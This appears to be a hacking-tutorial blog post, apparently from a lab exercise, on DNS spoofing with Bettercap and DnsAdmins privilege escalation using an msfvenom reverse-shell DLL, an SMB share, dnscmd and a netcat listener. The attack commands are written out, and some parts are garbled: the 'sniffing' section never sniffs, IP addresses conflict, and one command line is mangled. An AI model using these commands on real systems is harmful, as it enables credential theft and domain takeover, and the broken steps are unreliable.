Infrastructure Hacking: DNS Protocol II

This is the second part of the post about the DNS protocol and its vulnerabilities. If you have not yet read the first part, I recommend you to do so through this link.

In this post I will focus on two advanced hacking techniques related to the DNS protocol: firstly, the well-known DNS Spoofing, with which we can corrupt the DNS Resolver cache, and secondly, an example of how to sniff the traffic on port 53 UDP where the DNS service runs.

DNS Spoofing

This attack consists of altering the DNS cache so that the original traffic is redirected to a fraudulent website. Once redirected, it is normal in this type of attack for that website to ask the user for their username and password and thus steal them. Since it is very easy to clone the original website because the HTML code is public, if a domain name similar to the original one is obtained, it is very easy to trick the user.

To perform DNS spoofing I am going to use the Bettercap 2  tool. 

Once installed, we run it and see the basic commands with help:

Infrastructure Hacking: DNS Protocol II

We can also see which modules we have active, since with this tool we can also perform other attacks such as arp spoofing or dhcp6 spoofing.

For this machine we are going to activate both arp spoofing and dns spoofing. To do this we use the following commands:

  • set arp.spoof.targets 172.16.10.138 <-  victim ip
  • arp.spoof on
  • set dns.spoof.domains sokar-dev <- domain we want to spoof
  • set dns.spoof.address 172.16.10.168 <- this is my ip
  • set dns.spoof.all true
  • dns.spoof on
  • activate

 With this we will have everything ready to perform dns spoofing. But first, let’s put some context: in this case, on the victim machine (172.16.10.138) a user is going to run a program that tries to connect to the ssh service of the sokar-dev domain. Our attack will consist of injecting a new line in the cache of this machine indicating that the ip address of the sokar-dev domain is ours, in this case 172.168.10.168.

When the user executes this program, this is the result before spoofing:

There is no entry in your DNS cache that tells you what ip the sokar-dev domain is on.

Now, we activate the arp spoofing with the commands shown above, and activate the ssh service on our machine with the command service ssh start.

In the logs of the Bettercap tool we can see how it is spoofing:

Now, when the victim executes this program, we can see how it connects to the SSH service of our ip address, thus successfully performing DNS Spoofing:

Sniffing traffic on UDP port 53

We are now going to see how to spy on the requests and responses that are sent in DNS traffic. To do this we will use the following program: https://github.com/GhostPack/Seatbelt

We discover the DNS Admin: SSID of the following machine:

If you notice, the DNS doesn’t end in 500 something, that means it’s not a default, like all the users above, so it’s something we need to investigate.

We are going to do queries using rpcclient:

Query to display the members of a group:

User 0x451 is the member of the Contractors group, which is the DNS Admins group.

If we obtain this user’s credentials and get a shell, we can execute code in the Domain Controller by escalating privileges. One of the easiest ways to do this is to create a malicious dll and run the dnscmd.exe program with that user. You can see how to create a malicious dll in this other blog post. Let’s digress briefly and quickly review how this escalation would be done in this particular case, assuming that we have access to the DNS Admin user:

  1. We create the malicious dll with msfvenom, specifying our ip and the port through which we will receive the reverse shell.
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f dll > privesc.dll

2. We set up an SMB server with impacket on our machine to transfer the file.

python smbserver.py share ./

3. Add the dll from powershell with the user DNS Admin:

dnscmd  /config /serverlevelplugindll \\\share\privesc.dll

4.Finally, we listen on the port we indicated in step 1 and restart the dns server:

nc -lvnp sc.exe  stop dns
sc.exe start dns

This will give us an administrator terminal (nt authority), having successfully performed the privilege escalation.

Let’s try it on this machine:

If megabank.local doesn’t work you can try 127.0.0.1

Then we restart the dns service with the commands sc.exe stop dns and sc.exe start dns.

And in this way, listening on the port that we have configured in the dll, we will get an administrator shell:

I hope you found all this information about the DNS protocol useful. If you liked it, I recommend you take a look at the other entries under the infrastructure hacking category, where you can find vulnerabilities in protocols such as FTP, SSH, TELNET, WHOIS, etc. See you in future posts with more protocol vulnerabilities.

Lethani.

4/5 - (53 votes)

Leave a comment